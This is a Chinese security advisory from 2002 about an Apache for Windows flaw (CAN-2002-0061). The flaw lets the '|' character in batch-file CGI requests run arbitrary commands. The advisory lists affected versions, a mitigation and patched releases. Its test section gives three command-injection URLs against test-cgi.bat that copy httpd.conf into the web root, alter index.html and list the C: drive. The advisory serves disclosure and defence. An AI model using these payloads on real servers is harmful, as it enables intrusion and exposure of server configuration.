首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第30期->最新漏洞
出处:Ory Segal (ORY.SEGAL@SANCTUMINC.COM)
主页:http://www.apache.org
日期:2002-04-12
更新日期: 2002-3-25
受影响的系统:
Apache Group Apache 1.3.9win32
Apache Group Apache 1.3.6win32
Apache Group Apache 1.3.11win32
Apache Group Apache 1.3.12win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Apache Group Apache 1.3.13win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Apache Group Apache 1.3.14win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Apache Group Apache 1.3.15win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Apache Group Apache 1.3.16win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Apache Group Apache 1.3.17win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Apache Group Apache 1.3.18win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Apache Group Apache 1.3.19win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Apache Group Apache 1.3.20win32
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Apache Group Apache 1.3.22win32
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Apache Group Apache 1.3.23win32
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Apache Group Apache 2.0.28-BETA win32
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Apache Group Apache 2.0.32-BETA win32
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
不受影响系统:
Apache Group Apache 1.3.24win32
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
Apache Group Apache 2.0.34-BETA win32
- Microsoft Windows XP Professional
- Microsoft Windows XP Home
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
描述:
--------------------------------------------------------------------------
BUGTRAQ ID: 4335
CVE(CAN) ID: CAN-2002-0061
Apache是使用最广泛的web服务器,分Unix和Windows两种发行版本。
Windows版本的Apache在处理批处理文件的web请求没有过滤一些特殊字符(比如'|'),远程攻击者可以利用这个漏洞在目标主机执行任意命令。
Apache在Windows操作系统下一般都是以SYSTEM权限运行,所以会造成很大的危害。
2.0.x系列的Windows版Apache默认安装都自带了一个test的批处理文件,这个文件可以利用来执行命令。其它任意可以通过Web访问的批处理文件都可以利用。
<*来源:Ory Segal (ORY.SEGAL@SANCTUMINC.COM)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-03/0270.html
*>
测试程序:
--------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Ory Segal (ORY.SEGAL@SANCTUMINC.COM)提供了如下测试方法:
1) http://TARGET/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf
这个请求将把conf目录下的httpd.conf拷贝到web目录htdocs。
2) http://TARGET/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..\htdocs\index.html
这个请求将给htdocs目录下的index.html文件添加字串"Foobar"。
3) http://TARGET/cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt
这个请求将在htdocs目录下的建立一个C盘根目录列表的文件dir.txt。
--------------------------------------------------------------------------建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 删除cgi-bin目录下所有批处理文件。
厂商补丁:
Apache Group
------------
目前1.3.24win32和2.0.34-BETA win32的发行版本已经修复这个安全问题,请到厂商的主页下载:
http://www.apache.org
版权所有,未经许可,不得转载